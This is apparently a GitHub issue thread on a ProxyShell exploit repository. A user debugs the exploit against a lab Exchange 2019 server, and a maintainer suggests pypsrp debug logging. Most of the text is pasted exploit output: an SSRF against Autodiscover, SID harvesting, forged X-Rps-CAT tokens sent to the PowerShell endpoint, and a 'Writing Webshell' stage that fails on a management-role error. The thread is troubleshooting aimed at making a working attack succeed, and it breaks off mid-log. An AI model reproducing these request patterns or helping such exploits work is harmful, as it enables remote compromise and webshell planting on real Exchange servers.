ProxyShell
ProxyShell copied to clipboard
ktecv2000
Exploit hangs at "[Stage 4] Dealing with PSRP".
Hi,
Thank you for your effort!
When I try this against Exchange 2019 CU 8 (which is vulnerable), the exploit seem to work up to the point "[Stage 4] Dealing with PSRP" where it hangs.
Is there anything I can do to fix this?
Thanks!
Hi,
Thank you for your effort!
When I try this against Exchange 2019 CU 8 (which is vulnerable), the exploit seem to work up to the point "[Stage 4] Dealing with PSRP" where it hangs.
Is there anything I can do to fix this?
Thanks!
Interesting, you can try this method to get further info
- create a file named
log.json
{
"version": 1,
"disable_existing_loggers": false,
"formatters": {
"simple": {
"format": "%(asctime)s - %(name)s - %(levelname)s - %(message)s"
}
},
"handlers": {
"console": {
"class": "logging.StreamHandler",
"level": "DEBUG",
"formatter": "simple",
"stream": "ext://sys.stdout"
}
},
"loggers": {
"pypsrp": {
"level": "DEBUG",
"handlers": ["console"],
"propagate": "no"
}
}
}
- run exploit with this command
PYPSRP_LOG_CFG=log.json python3 exploit.py ...
It should give you tons of PSRP output, and you could leave the entire output here.
Sure. Here you go.
I noticed the text "...CmdletAccessDeniedException] The user "adlab.local/Users/Administrator" isn't assigned to any management roles." at the very end. Is that the problem? If so, why does the account differ from the one who's e-mail I am trying to abuse (domainadmin1)? Which management roles are required for this to work?
└─# PYPSRP_LOG_CFG=log.json python3 exploit.py 10.0.0.202 [email protected] 130 ⨯ [Stage 1] Performing SSRF attack against Autodiscover [Stage 2] Performing malformed SSRF attack to obtain Security ID (SID) using endpoint /mapi/emsmdb against 10.0.0.202 [Stage 2] User SID not an administrator, fixing user SID [Stage 2] Successfully obtained SID: S-1-5-21-1102219418-2391489858-980994391-500 [Stage 3] Accessing /Powershell Endpoint ... [Stage 3] Authentication Successfully Successfully sent email litte sleep to wait for mail sending [Stage 4] Writing Webshell ... [Stage 4] Dealing with WSMV 2021-08-21 10:06:03,378 - pypsrp.wsman - DEBUG - Initialising WSMan class with maximum envelope size of 153600 and operation timeout of 20 2021-08-21 10:06:03,378 - pypsrp.wsman - DEBUG - Initialising HTTP transport for endpoint: https://10.0.0.202:443//autodiscover/[email protected]/Powershell?X-Rps-CAT=VgEAVAdXaW5kb3dzQwBBBUJhc2ljTBhkb21haW5hZG1pbjFAYWRsYWIubG9jYWxVLFMtMS01LTIxLTExMDIyMTk0MTgtMjM5MTQ4OTg1OC05ODA5OTQzOTEtNTAwRwQAAAAHAAAAB1MtMS0xLTAHAAAAB1MtMS01LTIHAAAACFMtMS01LTExBwAAAAhTLTEtNS0xNUUAAAAA&Email=autodiscover/autodiscover.json%[email protected], auth: None, user: negotiate 2021-08-21 10:06:03,379 - pypsrp.wsman - DEBUG - Creating WSMan header (Action: http://schemas.microsoft.com/wbem/wsman/1/windows/shell/Send, Resource URI: http://schemas.microsoft.com/wbem/wsman/1/windows/shell/cmd, Option Set: None, Selector Set: {'ShellId': '00000000-0000-0000-0000-000000000000'} [Stage 4] Dealing with PSRP 2021-08-21 10:06:03,379 - pypsrp.powershell - INFO - Initialising RunspacePool object for configuration Microsoft.Exchange 2021-08-21 10:06:03,380 - pypsrp.powershell - INFO - Openning a new Runspace Pool on remote host 2021-08-21 10:06:03,380 - pypsrp.messages - DEBUG - Packing PSRP message: <Obj RefId="0"><MS><Version N="protocolversion">2.3</Version><Version N="PSVersion">2.0</Version><Version N="SerializationVersion">1.1.0.1</Version></MS></Obj> 2021-08-21 10:06:03,380 - pypsrp.messages - DEBUG - Packing PSRP message: <Obj RefId="0"><MS><I32 N="MinRunspaces">1</I32><I32 N="MaxRunspaces">1</I32><Obj RefId="1" N="PSThreadOptions"><TN RefId="0"><T>System.Management.Automation.Runspaces.PSThreadOptions</T><T>System.Enum</T><T>System.ValueType</T><T>System.Object</T></TN><ToString>Default</ToString><I32>0</I32></Obj><Obj RefId="2" N="ApartmentState"><TN RefId="1"><T>System.Management.Automation.Runspaces.ApartmentState</T><T>System.Enum</T><T>System.ValueType</T><T>System.Object</T></TN><ToString>UNKNOWN</ToString><I32>2</I32></Obj><Obj RefId="3" N="HostInfo"><MS><B N="_isHostNull">true</B><B N="_isHostUINull">true</B><B N="_isHostRawUINull">true</B><B N="_useRunspaceHost">true</B></MS></Obj><Nil N="ApplicationArguments" /></MS></Obj> 2021-08-21 10:06:03,381 - pypsrp.wsman - DEBUG - Creating WSMan header (Action: http://schemas.xmlsoap.org/ws/2004/09/transfer/Create, Resource URI: http://schemas.microsoft.com/powershell/Microsoft.Exchange, Option Set: {'protocolversion': '2.3'}, Selector Set: None 2021-08-21 10:06:03,381 - pypsrp.wsman - DEBUG - Building requests session with auth negotiate 2021-08-21 10:06:03,382 - pypsrp.wsman - DEBUG - Sending message: b'<s:Envelope xmlns:rsp="http://schemas.microsoft.com/wbem/wsman/1/windows/shell" xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsman="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd" xmlns:wsmv="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd"><s:Header><wsa:Action s:mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/09/transfer/Create</wsa:Action><wsmv:DataLocale s:mustUnderstand="false" xml:lang="en-US" /><wsman:Locale s:mustUnderstand="false" xml:lang="en-US" /><wsman:MaxEnvelopeSize s:mustUnderstand="true">153600</wsman:MaxEnvelopeSize>wsa:MessageIDuuid:35A48E11-4CFD-4230-87A7-C70AF4B0AE4B</wsa:MessageID>wsman:OperationTimeoutPT20S</wsman:OperationTimeout>wsa:ReplyTo<wsa:Address s:mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</wsa:Address></wsa:ReplyTo><wsman:ResourceURI s:mustUnderstand="true">http://schemas.microsoft.com/powershell/Microsoft.Exchange</wsman:ResourceURI><wsmv:SessionId s:mustUnderstand="false">uuid:01BF193D-6D07-42C1-BD1E-AA2702ABB153</wsmv:SessionId>wsa:Tohttps://10.0.0.202:443//autodiscover/[email protected]/Powershell?X-Rps-CAT=VgEAVAdXaW5kb3dzQwBBBUJhc2ljTBhkb21haW5hZG1pbjFAYWRsYWIubG9jYWxVLFMtMS01LTIxLTExMDIyMTk0MTgtMjM5MTQ4OTg1OC05ODA5OTQzOTEtNTAwRwQAAAAHAAAAB1MtMS0xLTAHAAAAB1MtMS01LTIHAAAACFMtMS01LTExBwAAAAhTLTEtNS0xNUUAAAAA&Email=autodiscover/autodiscover.json%[email protected]</wsa:To><wsman:OptionSet s:mustUnderstand="true"><wsman:Option MustComply="true" Name="protocolversion">2.3</wsman:Option></wsman:OptionSet></s:Header><s:Body><rsp:Shell ShellId="5A04DA5D-7481-449F-B6D2-865A98422799">rsp:InputStreamsstdin pr</rsp:InputStreams>rsp:OutputStreamsstdout</rsp:OutputStreams><creationXml xmlns="http://schemas.microsoft.com/powershell">AAAAAAAAAAEAAAAAAAAAAAMAAADHAgAAAAIAAQBd2gRagXSfRLbShlqYQieZAAAAAAAAAAAAAAAAAAAAADxPYmogUmVmSWQ9IjAiPjxNUz48VmVyc2lvbiBOPSJwcm90b2NvbHZlcnNpb24iPjIuMzwvVmVyc2lvbj48VmVyc2lvbiBOPSJQU1ZlcnNpb24iPjIuMDwvVmVyc2lvbj48VmVyc2lvbiBOPSJTZXJpYWxpemF0aW9uVmVyc2lvbiI+MS4xLjAuMTwvVmVyc2lvbj48L01TPjwvT2JqPgAAAAAAAAACAAAAAAAAAAADAAAC/QIAAAAEAAEAXdoEWoF0n0S20oZamEInmQAAAAAAAAAAAAAAAAAAAAA8T2JqIFJlZklkPSIwIj48TVM+PEkzMiBOPSJNaW5SdW5zcGFjZXMiPjE8L0kzMj48STMyIE49Ik1heFJ1bnNwYWNlcyI+MTwvSTMyPjxPYmogUmVmSWQ9IjEiIE49IlBTVGhyZWFkT3B0aW9ucyI+PFROIFJlZklkPSIwIj48VD5TeXN0ZW0uTWFuYWdlbWVudC5BdXRvbWF0aW9uLlJ1bnNwYWNlcy5QU1RocmVhZE9wdGlvbnM8L1Q+PFQ+U3lzdGVtLkVudW08L1Q+PFQ+U3lzdGVtLlZhbHVlVHlwZTwvVD48VD5TeXN0ZW0uT2JqZWN0PC9UPjwvVE4+PFRvU3RyaW5nPkRlZmF1bHQ8L1RvU3RyaW5nPjxJMzI+MDwvSTMyPjwvT2JqPjxPYmogUmVmSWQ9IjIiIE49IkFwYXJ0bWVudFN0YXRlIj48VE4gUmVmSWQ9IjEiPjxUPlN5c3RlbS5NYW5hZ2VtZW50LkF1dG9tYXRpb24uUnVuc3BhY2VzLkFwYXJ0bWVudFN0YXRlPC9UPjxUPlN5c3RlbS5FbnVtPC9UPjxUPlN5c3RlbS5WYWx1ZVR5cGU8L1Q+PFQ+U3lzdGVtLk9iamVjdDwvVD48L1ROPjxUb1N0cmluZz5VTktOT1dOPC9Ub1N0cmluZz48STMyPjI8L0kzMj48L09iaj48T2JqIFJlZklkPSIzIiBOPSJIb3N0SW5mbyI+PE1TPjxCIE49Il9pc0hvc3ROdWxsIj50cnVlPC9CPjxCIE49Il9pc0hvc3RVSU51bGwiPnRydWU8L0I+PEIgTj0iX2lzSG9zdFJhd1VJTnVsbCI+dHJ1ZTwvQj48QiBOPSJfdXNlUnVuc3BhY2VIb3N0Ij50cnVlPC9CPjwvTVM+PC9PYmo+PE5pbCBOPSJBcHBsaWNhdGlvbkFyZ3VtZW50cyIgLz48L01TPjwvT2JqPg==</creationXml></rsp:Shell></s:Body></s:Envelope>' 2021-08-21 10:06:03,435 - pypsrp.wsman - DEBUG - Received message: <s:Envelope xml:lang="en-US" xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:x="http://schemas.xmlsoap.org/ws/2004/09/transfer" xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd" xmlns:rsp="http://schemas.microsoft.com/wbem/wsman/1/windows/shell" xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd"><s:Header><a:Action>http://schemas.xmlsoap.org/ws/2004/09/transfer/CreateResponse</a:Action><a:MessageID>uuid:21AF8983-96DF-4E32-B3BD-72CC71A06450</a:MessageID><a:To>http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:To><a:RelatesTo>uuid:35A48E11-4CFD-4230-87A7-C70AF4B0AE4B</a:RelatesTo></s:Header><s:Body><x:ResourceCreated><a:Address>https://10.0.0.202:443//autodiscover/[email protected]/Powershell?X-Rps-CAT=VgEAVAdXaW5kb3dzQwBBBUJhc2ljTBhkb21haW5hZG1pbjFAYWRsYWIubG9jYWxVLFMtMS01LTIxLTExMDIyMTk0MTgtMjM5MTQ4OTg1OC05ODA5OTQzOTEtNTAwRwQAAAAHAAAAB1MtMS0xLTAHAAAAB1MtMS01LTIHAAAACFMtMS01LTExBwAAAAhTLTEtNS0xNUUAAAAA&Email=autodiscover/autodiscover.json%[email protected]</a:Address><a:ReferenceParameters><w:ResourceURI>http://schemas.microsoft.com/powershell/Microsoft.Exchange</w:ResourceURI><w:SelectorSet><w:Selector Name="ShellId">39B99A93-2A5E-460A-A940-03EF1842FF45</w:Selector></w:SelectorSet></a:ReferenceParameters></x:ResourceCreated><rsp:Shell xmlns:rsp="http://schemas.microsoft.com/wbem/wsman/1/windows/shell">rsp:ShellId39B99A93-2A5E-460A-A940-03EF1842FF45</rsp:ShellId>rsp:ResourceUrihttp://schemas.microsoft.com/powershell/Microsoft.Exchange</rsp:ResourceUri>rsp:Owner[email protected]</rsp:Owner>rsp:ClientIPfe80::cda3:517c:f2ba:7ec9%3</rsp:ClientIP>rsp:IdleTimeOutPT900.000S</rsp:IdleTimeOut>rsp:InputStreamsstdin pr</rsp:InputStreams>rsp:OutputStreamsstdout</rsp:OutputStreams>rsp:ShellRunTimeP0DT0H0M0S</rsp:ShellRunTime>rsp:ShellInactivityP0DT0H0M0S</rsp:ShellInactivity></rsp:Shell></s:Body></s:Envelope> 2021-08-21 10:06:03,436 - pypsrp.wsman - DEBUG - Creating WSMan header (Action: http://schemas.microsoft.com/wbem/wsman/1/windows/shell/Receive, Resource URI: http://schemas.microsoft.com/powershell/Microsoft.Exchange, Option Set: {'WSMAN_CMDSHELL_OPTION_KEEPALIVE': 'True'}, Selector Set: {'ShellId': '39B99A93-2A5E-460A-A940-03EF1842FF45'} 2021-08-21 10:06:03,436 - pypsrp.wsman - DEBUG - Sending message: b'<s:Envelope xmlns:rsp="http://schemas.microsoft.com/wbem/wsman/1/windows/shell" xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsman="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd" xmlns:wsmv="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd"><s:Header><wsa:Action s:mustUnderstand="true">http://schemas.microsoft.com/wbem/wsman/1/windows/shell/Receive</wsa:Action><wsmv:DataLocale s:mustUnderstand="false" xml:lang="en-US" /><wsman:Locale s:mustUnderstand="false" xml:lang="en-US" /><wsman:MaxEnvelopeSize s:mustUnderstand="true">153600</wsman:MaxEnvelopeSize>wsa:MessageIDuuid:6626FC3D-FD6F-4204-A421-0D5758EACA17</wsa:MessageID>wsman:OperationTimeoutPT20S</wsman:OperationTimeout>wsa:ReplyTo<wsa:Address s:mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</wsa:Address></wsa:ReplyTo><wsman:ResourceURI s:mustUnderstand="true">http://schemas.microsoft.com/powershell/Microsoft.Exchange</wsman:ResourceURI><wsmv:SessionId s:mustUnderstand="false">uuid:01BF193D-6D07-42C1-BD1E-AA2702ABB153</wsmv:SessionId>wsa:Tohttps://10.0.0.202:443//autodiscover/[email protected]/Powershell?X-Rps-CAT=VgEAVAdXaW5kb3dzQwBBBUJhc2ljTBhkb21haW5hZG1pbjFAYWRsYWIubG9jYWxVLFMtMS01LTIxLTExMDIyMTk0MTgtMjM5MTQ4OTg1OC05ODA5OTQzOTEtNTAwRwQAAAAHAAAAB1MtMS0xLTAHAAAAB1MtMS01LTIHAAAACFMtMS01LTExBwAAAAhTLTEtNS0xNUUAAAAA&Email=autodiscover/autodiscover.json%[email protected]</wsa:To><wsman:OptionSet s:mustUnderstand="true"><wsman:Option Name="WSMAN_CMDSHELL_OPTION_KEEPALIVE">True</wsman:Option></wsman:OptionSet>wsman:SelectorSet<wsman:Selector Name="ShellId">39B99A93-2A5E-460A-A940-03EF1842FF45</wsman:Selector></wsman:SelectorSet></s:Header><s:Body>rsp:Receiversp:DesiredStreamstdout</rsp:DesiredStream></rsp:Receive></s:Body></s:Envelope>' 2021-08-21 10:06:03,535 - pypsrp.wsman - DEBUG - Received message: <s:Envelope xml:lang="en-US" xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:x="http://schemas.xmlsoap.org/ws/2004/09/transfer" xmlns:e="http://schemas.xmlsoap.org/ws/2004/08/eventing" xmlns:n="http://schemas.xmlsoap.org/ws/2004/09/enumeration" xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd" xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd"><s:Header><a:Action>http://schemas.dmtf.org/wbem/wsman/1/wsman/fault</a:Action><a:MessageID>uuid:AC597784-57CA-4206-AC3B-BC3BFD3B7715</a:MessageID><a:To>http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:To><a:RelatesTo>uuid:6626FC3D-FD6F-4204-A421-0D5758EACA17</a:RelatesTo></s:Header><s:Body><s:Fault><s:Code><s:Value>s:Receiver</s:Value><s:Subcode><s:Value>w:InternalError</s:Value></s:Subcode></s:Code><s:Reason><s:Text xml:lang="en-US"></s:Text></s:Reason><s:Detail><f:WSManFault xmlns:f="http://schemas.microsoft.com/wbem/wsman/1/wsmanfault" Code="2152992672" Machine="10.0.0.202"><f:Message><f:ProviderFault provider="PowerShellplugin" path="%windir%\system32\pwrshplugin.dll">[AuthZRequestId=9e69487d-c7b1-4a47-99a6-21273ba3e53d][FailureCategory=AuthZ-CmdletAccessDeniedException] The user "adlab.local/Users/Administrator" isn't assigned to any management roles.</f:ProviderFault></f:Message></f:WSManFault></s:Detail></s:Fault></s:Body></s:Envelope>
So weird, would you like to create another user account for it and try again ?
I added a mailbox for the domain account adlab.local\domainuser1 and ran the same command again. It seems the same issue occurs.
└─# PYPSRP_LOG_CFG=log.json python3 exploit.py 10.0.0.202 [email protected] [Stage 1] Performing SSRF attack against Autodiscover [Stage 2] Performing malformed SSRF attack to obtain Security ID (SID) using endpoint /mapi/emsmdb against 10.0.0.202 [Stage 2] User SID not an administrator, fixing user SID [Stage 2] Successfully obtained SID: S-1-5-21-1102219418-2391489858-980994391-500 [Stage 3] Accessing /Powershell Endpoint ... [Stage 3] Authentication Successfully Successfully sent email litte sleep to wait for mail sending [Stage 4] Writing Webshell ... [Stage 4] Dealing with WSMV 2021-08-21 21:15:54,534 - pypsrp.wsman - DEBUG - Initialising WSMan class with maximum envelope size of 153600 and operation timeout of 20 2021-08-21 21:15:54,534 - pypsrp.wsman - DEBUG - Initialising HTTP transport for endpoint: https://10.0.0.202:443//autodiscover/[email protected]/Powershell?X-Rps-CAT=VgEAVAdXaW5kb3dzQwBBBUJhc2ljTBdkb21haW51c2VyMUBhZGxhYi5sb2NhbFUsUy0xLTUtMjEtMTEwMjIxOTQxOC0yMzkxNDg5ODU4LTk4MDk5NDM5MS01MDBHBAAAAAcAAAAHUy0xLTEtMAcAAAAHUy0xLTUtMgcAAAAIUy0xLTUtMTEHAAAACFMtMS01LTE1RQAAAAA=&Email=autodiscover/autodiscover.json%[email protected], auth: None, user: negotiate 2021-08-21 21:15:54,534 - pypsrp.wsman - DEBUG - Creating WSMan header (Action: http://schemas.microsoft.com/wbem/wsman/1/windows/shell/Send, Resource URI: http://schemas.microsoft.com/wbem/wsman/1/windows/shell/cmd, Option Set: None, Selector Set: {'ShellId': '00000000-0000-0000-0000-000000000000'} [Stage 4] Dealing with PSRP 2021-08-21 21:15:54,535 - pypsrp.powershell - INFO - Initialising RunspacePool object for configuration Microsoft.Exchange 2021-08-21 21:15:54,535 - pypsrp.powershell - INFO - Openning a new Runspace Pool on remote host 2021-08-21 21:15:54,535 - pypsrp.messages - DEBUG - Packing PSRP message: <Obj RefId="0"><MS><Version N="protocolversion">2.3</Version><Version N="PSVersion">2.0</Version><Version N="SerializationVersion">1.1.0.1</Version></MS></Obj> 2021-08-21 21:15:54,536 - pypsrp.messages - DEBUG - Packing PSRP message: <Obj RefId="0"><MS><I32 N="MinRunspaces">1</I32><I32 N="MaxRunspaces">1</I32><Obj RefId="1" N="PSThreadOptions"><TN RefId="0"><T>System.Management.Automation.Runspaces.PSThreadOptions</T><T>System.Enum</T><T>System.ValueType</T><T>System.Object</T></TN><ToString>Default</ToString><I32>0</I32></Obj><Obj RefId="2" N="ApartmentState"><TN RefId="1"><T>System.Management.Automation.Runspaces.ApartmentState</T><T>System.Enum</T><T>System.ValueType</T><T>System.Object</T></TN><ToString>UNKNOWN</ToString><I32>2</I32></Obj><Obj RefId="3" N="HostInfo"><MS><B N="_isHostNull">true</B><B N="_isHostUINull">true</B><B N="_isHostRawUINull">true</B><B N="_useRunspaceHost">true</B></MS></Obj><Nil N="ApplicationArguments" /></MS></Obj> 2021-08-21 21:15:54,536 - pypsrp.wsman - DEBUG - Creating WSMan header (Action: http://schemas.xmlsoap.org/ws/2004/09/transfer/Create, Resource URI: http://schemas.microsoft.com/powershell/Microsoft.Exchange, Option Set: {'protocolversion': '2.3'}, Selector Set: None 2021-08-21 21:15:54,537 - pypsrp.wsman - DEBUG - Building requests session with auth negotiate 2021-08-21 21:15:54,537 - pypsrp.wsman - DEBUG - Sending message: b'<s:Envelope xmlns:rsp="http://schemas.microsoft.com/wbem/wsman/1/windows/shell" xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsman="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd" xmlns:wsmv="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd"><s:Header><wsa:Action s:mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/09/transfer/Create</wsa:Action><wsmv:DataLocale s:mustUnderstand="false" xml:lang="en-US" /><wsman:Locale s:mustUnderstand="false" xml:lang="en-US" /><wsman:MaxEnvelopeSize s:mustUnderstand="true">153600</wsman:MaxEnvelopeSize>wsa:MessageIDuuid:C9FCC9FC-FE40-4001-A0A4-FABC4B644F56</wsa:MessageID>wsman:OperationTimeoutPT20S</wsman:OperationTimeout>wsa:ReplyTo<wsa:Address s:mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</wsa:Address></wsa:ReplyTo><wsman:ResourceURI s:mustUnderstand="true">http://schemas.microsoft.com/powershell/Microsoft.Exchange</wsman:ResourceURI><wsmv:SessionId s:mustUnderstand="false">uuid:9ED69F9D-4B8A-4477-A935-C67F41E616B2</wsmv:SessionId>wsa:Tohttps://10.0.0.202:443//autodiscover/[email protected]/Powershell?X-Rps-CAT=VgEAVAdXaW5kb3dzQwBBBUJhc2ljTBdkb21haW51c2VyMUBhZGxhYi5sb2NhbFUsUy0xLTUtMjEtMTEwMjIxOTQxOC0yMzkxNDg5ODU4LTk4MDk5NDM5MS01MDBHBAAAAAcAAAAHUy0xLTEtMAcAAAAHUy0xLTUtMgcAAAAIUy0xLTUtMTEHAAAACFMtMS01LTE1RQAAAAA=&Email=autodiscover/autodiscover.json%[email protected]</wsa:To><wsman:OptionSet s:mustUnderstand="true"><wsman:Option MustComply="true" Name="protocolversion">2.3</wsman:Option></wsman:OptionSet></s:Header><s:Body><rsp:Shell ShellId="74E8C231-AE4C-42F2-8081-099572D1E76B">rsp:InputStreamsstdin pr</rsp:InputStreams>rsp:OutputStreamsstdout</rsp:OutputStreams><creationXml xmlns="http://schemas.microsoft.com/powershell">AAAAAAAAAAEAAAAAAAAAAAMAAADHAgAAAAIAAQAxwuh0TK7yQoCBCZVy0edrAAAAAAAAAAAAAAAAAAAAADxPYmogUmVmSWQ9IjAiPjxNUz48VmVyc2lvbiBOPSJwcm90b2NvbHZlcnNpb24iPjIuMzwvVmVyc2lvbj48VmVyc2lvbiBOPSJQU1ZlcnNpb24iPjIuMDwvVmVyc2lvbj48VmVyc2lvbiBOPSJTZXJpYWxpemF0aW9uVmVyc2lvbiI+MS4xLjAuMTwvVmVyc2lvbj48L01TPjwvT2JqPgAAAAAAAAACAAAAAAAAAAADAAAC/QIAAAAEAAEAMcLodEyu8kKAgQmVctHnawAAAAAAAAAAAAAAAAAAAAA8T2JqIFJlZklkPSIwIj48TVM+PEkzMiBOPSJNaW5SdW5zcGFjZXMiPjE8L0kzMj48STMyIE49Ik1heFJ1bnNwYWNlcyI+MTwvSTMyPjxPYmogUmVmSWQ9IjEiIE49IlBTVGhyZWFkT3B0aW9ucyI+PFROIFJlZklkPSIwIj48VD5TeXN0ZW0uTWFuYWdlbWVudC5BdXRvbWF0aW9uLlJ1bnNwYWNlcy5QU1RocmVhZE9wdGlvbnM8L1Q+PFQ+U3lzdGVtLkVudW08L1Q+PFQ+U3lzdGVtLlZhbHVlVHlwZTwvVD48VD5TeXN0ZW0uT2JqZWN0PC9UPjwvVE4+PFRvU3RyaW5nPkRlZmF1bHQ8L1RvU3RyaW5nPjxJMzI+MDwvSTMyPjwvT2JqPjxPYmogUmVmSWQ9IjIiIE49IkFwYXJ0bWVudFN0YXRlIj48VE4gUmVmSWQ9IjEiPjxUPlN5c3RlbS5NYW5hZ2VtZW50LkF1dG9tYXRpb24uUnVuc3BhY2VzLkFwYXJ0bWVudFN0YXRlPC9UPjxUPlN5c3RlbS5FbnVtPC9UPjxUPlN5c3RlbS5WYWx1ZVR5cGU8L1Q+PFQ+U3lzdGVtLk9iamVjdDwvVD48L1ROPjxUb1N0cmluZz5VTktOT1dOPC9Ub1N0cmluZz48STMyPjI8L0kzMj48L09iaj48T2JqIFJlZklkPSIzIiBOPSJIb3N0SW5mbyI+PE1TPjxCIE49Il9pc0hvc3ROdWxsIj50cnVlPC9CPjxCIE49Il9pc0hvc3RVSU51bGwiPnRydWU8L0I+PEIgTj0iX2lzSG9zdFJhd1VJTnVsbCI+dHJ1ZTwvQj48QiBOPSJfdXNlUnVuc3BhY2VIb3N0Ij50cnVlPC9CPjwvTVM+PC9PYmo+PE5pbCBOPSJBcHBsaWNhdGlvbkFyZ3VtZW50cyIgLz48L01TPjwvT2JqPg==</creationXml></rsp:Shell></s:Body></s:Envelope>' 2021-08-21 21:15:54,562 - pypsrp.wsman - DEBUG - Received message: <s:Envelope xml:lang="en-US" xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:x="http://schemas.xmlsoap.org/ws/2004/09/transfer" xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd" xmlns:rsp="http://schemas.microsoft.com/wbem/wsman/1/windows/shell" xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd"><s:Header><a:Action>http://schemas.xmlsoap.org/ws/2004/09/transfer/CreateResponse</a:Action><a:MessageID>uuid:AECCBBD1-40A5-4491-A36B-6D90D91D0D86</a:MessageID><a:To>http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:To><a:RelatesTo>uuid:C9FCC9FC-FE40-4001-A0A4-FABC4B644F56</a:RelatesTo></s:Header><s:Body><x:ResourceCreated><a:Address>https://10.0.0.202:443//autodiscover/[email protected]/Powershell?X-Rps-CAT=VgEAVAdXaW5kb3dzQwBBBUJhc2ljTBdkb21haW51c2VyMUBhZGxhYi5sb2NhbFUsUy0xLTUtMjEtMTEwMjIxOTQxOC0yMzkxNDg5ODU4LTk4MDk5NDM5MS01MDBHBAAAAAcAAAAHUy0xLTEtMAcAAAAHUy0xLTUtMgcAAAAIUy0xLTUtMTEHAAAACFMtMS01LTE1RQAAAAA=&Email=autodiscover/autodiscover.json%[email protected]</a:Address><a:ReferenceParameters><w:ResourceURI>http://schemas.microsoft.com/powershell/Microsoft.Exchange</w:ResourceURI><w:SelectorSet><w:Selector Name="ShellId">0BD71E4F-89AD-4C4C-8A64-8888BB4D02F5</w:Selector></w:SelectorSet></a:ReferenceParameters></x:ResourceCreated><rsp:Shell xmlns:rsp="http://schemas.microsoft.com/wbem/wsman/1/windows/shell">rsp:ShellId0BD71E4F-89AD-4C4C-8A64-8888BB4D02F5</rsp:ShellId>rsp:ResourceUrihttp://schemas.microsoft.com/powershell/Microsoft.Exchange</rsp:ResourceUri>rsp:Owner[email protected]</rsp:Owner>rsp:ClientIPfe80::cda3:517c:f2ba:7ec9%3</rsp:ClientIP>rsp:IdleTimeOutPT900.000S</rsp:IdleTimeOut>rsp:InputStreamsstdin pr</rsp:InputStreams>rsp:OutputStreamsstdout</rsp:OutputStreams>rsp:ShellRunTimeP0DT0H0M0S</rsp:ShellRunTime>rsp:ShellInactivityP0DT0H0M0S</rsp:ShellInactivity></rsp:Shell></s:Body></s:Envelope> 2021-08-21 21:15:54,562 - pypsrp.wsman - DEBUG - Creating WSMan header (Action: http://schemas.microsoft.com/wbem/wsman/1/windows/shell/Receive, Resource URI: http://schemas.microsoft.com/powershell/Microsoft.Exchange, Option Set: {'WSMAN_CMDSHELL_OPTION_KEEPALIVE': 'True'}, Selector Set: {'ShellId': '0BD71E4F-89AD-4C4C-8A64-8888BB4D02F5'} 2021-08-21 21:15:54,563 - pypsrp.wsman - DEBUG - Sending message: b'<s:Envelope xmlns:rsp="http://schemas.microsoft.com/wbem/wsman/1/windows/shell" xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsman="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd" xmlns:wsmv="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd"><s:Header><wsa:Action s:mustUnderstand="true">http://schemas.microsoft.com/wbem/wsman/1/windows/shell/Receive</wsa:Action><wsmv:DataLocale s:mustUnderstand="false" xml:lang="en-US" /><wsman:Locale s:mustUnderstand="false" xml:lang="en-US" /><wsman:MaxEnvelopeSize s:mustUnderstand="true">153600</wsman:MaxEnvelopeSize>wsa:MessageIDuuid:9AA5D31F-5A08-474B-9A3B-30366DEC2883</wsa:MessageID>wsman:OperationTimeoutPT20S</wsman:OperationTimeout>wsa:ReplyTo<wsa:Address s:mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</wsa:Address></wsa:ReplyTo><wsman:ResourceURI s:mustUnderstand="true">http://schemas.microsoft.com/powershell/Microsoft.Exchange</wsman:ResourceURI><wsmv:SessionId s:mustUnderstand="false">uuid:9ED69F9D-4B8A-4477-A935-C67F41E616B2</wsmv:SessionId>wsa:Tohttps://10.0.0.202:443//autodiscover/[email protected]/Powershell?X-Rps-CAT=VgEAVAdXaW5kb3dzQwBBBUJhc2ljTBdkb21haW51c2VyMUBhZGxhYi5sb2NhbFUsUy0xLTUtMjEtMTEwMjIxOTQxOC0yMzkxNDg5ODU4LTk4MDk5NDM5MS01MDBHBAAAAAcAAAAHUy0xLTEtMAcAAAAHUy0xLTUtMgcAAAAIUy0xLTUtMTEHAAAACFMtMS01LTE1RQAAAAA=&Email=autodiscover/autodiscover.json%[email protected]</wsa:To><wsman:OptionSet s:mustUnderstand="true"><wsman:Option 